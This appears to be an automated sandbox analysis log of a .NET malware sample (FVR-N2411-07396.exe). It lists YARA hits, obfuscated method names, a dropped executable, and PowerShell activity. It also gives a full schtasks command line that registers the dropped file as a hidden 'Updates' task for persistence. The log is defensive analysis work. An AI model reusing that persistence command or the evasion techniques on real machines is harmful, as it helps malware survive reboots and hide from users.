                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR
                      Source: FVR-N2411-07396.exeStatic PE information: 0xD1D92115 [Fri Jul 25 11:18:45 2081 UTC]
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_0284EFB0 push esp; iretd 0_2_0284EFB1
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_07200CD2 push FFFFFFBBh; ret 0_2_07200CD4
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_00B4EFB0 push esp; iretd 8_2_00B4EFB1
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AD4
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AFC
                      Source: FVR-N2411-07396.exeStatic PE information: section name: .text entropy: 7.731637245415364
                      Source: ZeJFfrYmOnJKS.exe.0.drStatic PE information: section name: .text entropy: 7.731637245415364
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, kR5Zu6rQZ9pk5Z1T9Y.csHigh entropy of concatenated method names: 'jWGuOxCXC4', 'MhRuvKSXgT', 'DuRupfZ1Ay', 'tA3uhkJfkR', 'EfouS7XS2b', 'UppumaWtFP', 'bbluPFD7kS', 'sgOufq0cT5', 'IUuuTVXudN', 'pyOuimrhI1'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, yoviBaDFVvgmcnwmMa.csHigh entropy of concatenated method names: 'K0n7BoxZV2', 'Wx17LC0bwZ', 'JeK77k2ooD', 'WuJ7kqYBS7', 'wCb7yjedtA', 'ciw7tmU9vI', 'Dispose', 'Dh1nAmq8La', 'f8anHJsUxC', 'Ascn0Y9aWn'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, Tsw2ZcHAjSja6s8HSf.csHigh entropy of concatenated method names: 'Dispose', 'ygmCRcnwmM', 'sr6WwsXyh3', 'dGqWB1boNy', 'NAPCXQI9J4', 'Y2aCzreK42', 'ProcessDialogKey', 'ktpWFF9nXe', 'fnOWCkkXrg', 'SNmWWWWFvx'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, vMlPAnTPODhkqCPJR0.csHigh entropy of concatenated method names: 'MLq0hoy2Ue', 'hl50mwyNHh', 'gPr0fGL45I', 'GGg0TEiHh2', 'IPJ0B6luEl', 'DnR0dtGwtJ', 'VOh0LYHA0T', 'BMg0nXwPdR', 'C1l07tAiUr', 'SUp0KuHjox'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, BtG9i9CCpdyu6WtoZHM.csHigh entropy of concatenated method names: 'H9FKXil0UO', 'Dn5KzNJYie', 'Fp8kFQCXUa', 'VAFkCw5QQX', 'WeukWTLjTC', 'l1ikoaBy3l', 't0Qk859SCT', 'Aepkgwrj9T', 'M7YkANQEa4', 'qI2kHhGIpU'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, bJK5w298pUyP0g8lHM.csHigh entropy of concatenated method names: 'ssuLVRWIfh', 'yfULXJCscI', 'gNxnF7j3Xl', 'MiCnCe5j42', 'LonLYuBSmB', 'Q0NL34iD43', 'UGiLeZFNlc', 'sUUL1qI1vi', 'rvwL5G54fb', 'pMvLEjgKDX'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, ITxStP87Ysreue9pxA.csHigh entropy of concatenated method names: 'aACCupDEs3', 'GTUCZ4OZfK', 'rPOC6DhkqC', 'CJRCb0jYuY', 'SKHCBfe6uc', 'qRtCdG0HaK', 'c4XT6IfENjMQ6ukpRA', 'Hfw6CVwc7KAuFuFwZb', 'qMYCC2lUw2', 'CxkCoboxni'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, apDEs3fGTU4OZfKjCi.csHigh entropy of concatenated method names: 'EQiH11E60H', 'qJaH5iMy7A', 'd0wHEpcwVh', 'UYHH4apGl4', 'eqVHQxmB6A', 'gs8H9FN2jl', 'Wj5HD7Uomf', 'RrZHVKsGl3', 'l65HRoR9QF', 'vheHXHHrHD'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, FLeEUIeZnbExMFAReZ.csHigh entropy of concatenated method names: 'FT4lfpFPTt', 'MpVlTX0U98', 'XpDlGOA4gv', 'XJ4lwhSrIE', 'mMIl2xhQex', 'MeRlJVW4vu', 'HsKljQ6OFE', 'wMAlcZ8gC6', 'S7bla3qhBR', 'MwjlYm5Nc6'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, xiDyMSzBX4NyV3rjYM.csHigh entropy of concatenated method names: 'un0Km4gmmJ', 'fBIKfn7djX', 'rrCKThCruP', 'JX9KGnDhEl', 'm5GKw56NI7', 'QyoK2KLYsf', 'UlwKJtogKo', 'v9uKt3UC9m', 'uoSKOvNuAo', 'wvtKvT7LCK'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, mucLRtGG0HaKkrRQgu.csHigh entropy of concatenated method names: 'lMNIgNwVH5', 'wwcIHiSjhi', 'g1gIxpZPU5', 'f09Iu7b1tf', 'vU0IZSS023', 'H6xxQbfqtQ', 'yrpx9KpnBU', 'zIfxDA13ZT', 'iBPxVigHX5', 'O38xRh6Rv0'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, fZoudy0p4k5NuTxMFa.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'T38WRyKA3X', 'Id2WXRuY76', 'WmTWzAihLn', 'OxYoF0myjY', 'xgEoC6j6si', 'fMhoWfG7Gu', 'S03oo9D1hN', 'HppypyqXguitEsX1EEC'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, zF9nXeRHnOkkXrg5Nm.csHigh entropy of concatenated method names: 'S5H7GlNfL9', 'Hi87wjG14M', 'MwM7NvgRYj', 'Tsd72m23n6', 'Mdd7JhMKMP', 'AJR7UfOiVn', 'xci7jLJ6Gq', 'fk47c7Tbd2', 'RnP7r8m7vk', 'AFy7a0H6vu'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, SNqeZA1SD2vlv8fMBa.csHigh entropy of concatenated method names: 'MrMBaGUGuC', 'WNGB3EJXw3', 'afqB1pbsBg', 'AbZB5udXyD', 'HDoBwo2bja', 'gV7BN0yqy8', 'gTZB2nnnFA', 'kBLBJvaqHj', 'ugZBUuxnc8', 'Xs4BjwiDyU'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, LYuYgyidosNTOEKHfe.csHigh entropy of concatenated method names: 'XKfxSpdPAA', 'lj9xPHxpgB', 'dqC0NNoZhS', 'r0C020NtFV', 'sIm0JkoAxh', 'Tvj0UUp2xS', 'X8m0jxxHh1', 'zFk0cUrVIq', 'pCE0rZW4ek', 'iMd0agXrAH'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, KyFtrLW9OxiCByct8O.csHigh entropy of concatenated method names: 'FeWpYBlEv', 'yXRhD2Hgb', 'wupm6Vg8S', 'wH0PtKdrm', 'y9MTs2IgB', 'CeGibS8OO', 'a7Lt9TGVWb3kaHoWfA', 'WAWqanxCDpyPGsRlCV', 'irZnLrRH4', 'DaYKYurex'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, qQ1kUHCFvTre2fluZHZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bpRKYhDnvP', 'JXpK33sS71', 'XTOKeMukX7', 'SvdK1i4cRY', 'aBdK5ZwZy8', 'a6dKEWGHw5', 'RJHK4XV03a'
                      Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.csHigh entropy of concatenated method names: 'DpEoghXPVh', 'wyRoAfA078', 'lk3oHq0r5f', 'yNZo0qLoNG', 'WqGoxOv6C0', 'kZqoIH8f6q', 'JP6ouIknPJ', 'r1DoZDH6M4', 'UNToMcp8v5', 'An8o6CgMob'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, kR5Zu6rQZ9pk5Z1T9Y.csHigh entropy of concatenated method names: 'jWGuOxCXC4', 'MhRuvKSXgT', 'DuRupfZ1Ay', 'tA3uhkJfkR', 'EfouS7XS2b', 'UppumaWtFP', 'bbluPFD7kS', 'sgOufq0cT5', 'IUuuTVXudN', 'pyOuimrhI1'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, yoviBaDFVvgmcnwmMa.csHigh entropy of concatenated method names: 'K0n7BoxZV2', 'Wx17LC0bwZ', 'JeK77k2ooD', 'WuJ7kqYBS7', 'wCb7yjedtA', 'ciw7tmU9vI', 'Dispose', 'Dh1nAmq8La', 'f8anHJsUxC', 'Ascn0Y9aWn'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, Tsw2ZcHAjSja6s8HSf.csHigh entropy of concatenated method names: 'Dispose', 'ygmCRcnwmM', 'sr6WwsXyh3', 'dGqWB1boNy', 'NAPCXQI9J4', 'Y2aCzreK42', 'ProcessDialogKey', 'ktpWFF9nXe', 'fnOWCkkXrg', 'SNmWWWWFvx'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, vMlPAnTPODhkqCPJR0.csHigh entropy of concatenated method names: 'MLq0hoy2Ue', 'hl50mwyNHh', 'gPr0fGL45I', 'GGg0TEiHh2', 'IPJ0B6luEl', 'DnR0dtGwtJ', 'VOh0LYHA0T', 'BMg0nXwPdR', 'C1l07tAiUr', 'SUp0KuHjox'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, BtG9i9CCpdyu6WtoZHM.csHigh entropy of concatenated method names: 'H9FKXil0UO', 'Dn5KzNJYie', 'Fp8kFQCXUa', 'VAFkCw5QQX', 'WeukWTLjTC', 'l1ikoaBy3l', 't0Qk859SCT', 'Aepkgwrj9T', 'M7YkANQEa4', 'qI2kHhGIpU'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, bJK5w298pUyP0g8lHM.csHigh entropy of concatenated method names: 'ssuLVRWIfh', 'yfULXJCscI', 'gNxnF7j3Xl', 'MiCnCe5j42', 'LonLYuBSmB', 'Q0NL34iD43', 'UGiLeZFNlc', 'sUUL1qI1vi', 'rvwL5G54fb', 'pMvLEjgKDX'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, ITxStP87Ysreue9pxA.csHigh entropy of concatenated method names: 'aACCupDEs3', 'GTUCZ4OZfK', 'rPOC6DhkqC', 'CJRCb0jYuY', 'SKHCBfe6uc', 'qRtCdG0HaK', 'c4XT6IfENjMQ6ukpRA', 'Hfw6CVwc7KAuFuFwZb', 'qMYCC2lUw2', 'CxkCoboxni'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, apDEs3fGTU4OZfKjCi.csHigh entropy of concatenated method names: 'EQiH11E60H', 'qJaH5iMy7A', 'd0wHEpcwVh', 'UYHH4apGl4', 'eqVHQxmB6A', 'gs8H9FN2jl', 'Wj5HD7Uomf', 'RrZHVKsGl3', 'l65HRoR9QF', 'vheHXHHrHD'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, FLeEUIeZnbExMFAReZ.csHigh entropy of concatenated method names: 'FT4lfpFPTt', 'MpVlTX0U98', 'XpDlGOA4gv', 'XJ4lwhSrIE', 'mMIl2xhQex', 'MeRlJVW4vu', 'HsKljQ6OFE', 'wMAlcZ8gC6', 'S7bla3qhBR', 'MwjlYm5Nc6'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, xiDyMSzBX4NyV3rjYM.csHigh entropy of concatenated method names: 'un0Km4gmmJ', 'fBIKfn7djX', 'rrCKThCruP', 'JX9KGnDhEl', 'm5GKw56NI7', 'QyoK2KLYsf', 'UlwKJtogKo', 'v9uKt3UC9m', 'uoSKOvNuAo', 'wvtKvT7LCK'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, mucLRtGG0HaKkrRQgu.csHigh entropy of concatenated method names: 'lMNIgNwVH5', 'wwcIHiSjhi', 'g1gIxpZPU5', 'f09Iu7b1tf', 'vU0IZSS023', 'H6xxQbfqtQ', 'yrpx9KpnBU', 'zIfxDA13ZT', 'iBPxVigHX5', 'O38xRh6Rv0'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, fZoudy0p4k5NuTxMFa.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'T38WRyKA3X', 'Id2WXRuY76', 'WmTWzAihLn', 'OxYoF0myjY', 'xgEoC6j6si', 'fMhoWfG7Gu', 'S03oo9D1hN', 'HppypyqXguitEsX1EEC'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, zF9nXeRHnOkkXrg5Nm.csHigh entropy of concatenated method names: 'S5H7GlNfL9', 'Hi87wjG14M', 'MwM7NvgRYj', 'Tsd72m23n6', 'Mdd7JhMKMP', 'AJR7UfOiVn', 'xci7jLJ6Gq', 'fk47c7Tbd2', 'RnP7r8m7vk', 'AFy7a0H6vu'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, SNqeZA1SD2vlv8fMBa.csHigh entropy of concatenated method names: 'MrMBaGUGuC', 'WNGB3EJXw3', 'afqB1pbsBg', 'AbZB5udXyD', 'HDoBwo2bja', 'gV7BN0yqy8', 'gTZB2nnnFA', 'kBLBJvaqHj', 'ugZBUuxnc8', 'Xs4BjwiDyU'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, LYuYgyidosNTOEKHfe.csHigh entropy of concatenated method names: 'XKfxSpdPAA', 'lj9xPHxpgB', 'dqC0NNoZhS', 'r0C020NtFV', 'sIm0JkoAxh', 'Tvj0UUp2xS', 'X8m0jxxHh1', 'zFk0cUrVIq', 'pCE0rZW4ek', 'iMd0agXrAH'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, KyFtrLW9OxiCByct8O.csHigh entropy of concatenated method names: 'FeWpYBlEv', 'yXRhD2Hgb', 'wupm6Vg8S', 'wH0PtKdrm', 'y9MTs2IgB', 'CeGibS8OO', 'a7Lt9TGVWb3kaHoWfA', 'WAWqanxCDpyPGsRlCV', 'irZnLrRH4', 'DaYKYurex'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, qQ1kUHCFvTre2fluZHZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bpRKYhDnvP', 'JXpK33sS71', 'XTOKeMukX7', 'SvdK1i4cRY', 'aBdK5ZwZy8', 'a6dKEWGHw5', 'RJHK4XV03a'
                      Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.csHigh entropy of concatenated method names: 'DpEoghXPVh', 'wyRoAfA078', 'lk3oHq0r5f', 'yNZo0qLoNG', 'WqGoxOv6C0', 'kZqoIH8f6q', 'JP6ouIknPJ', 'r1DoZDH6M4', 'UNToMcp8v5', 'An8o6CgMob'
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
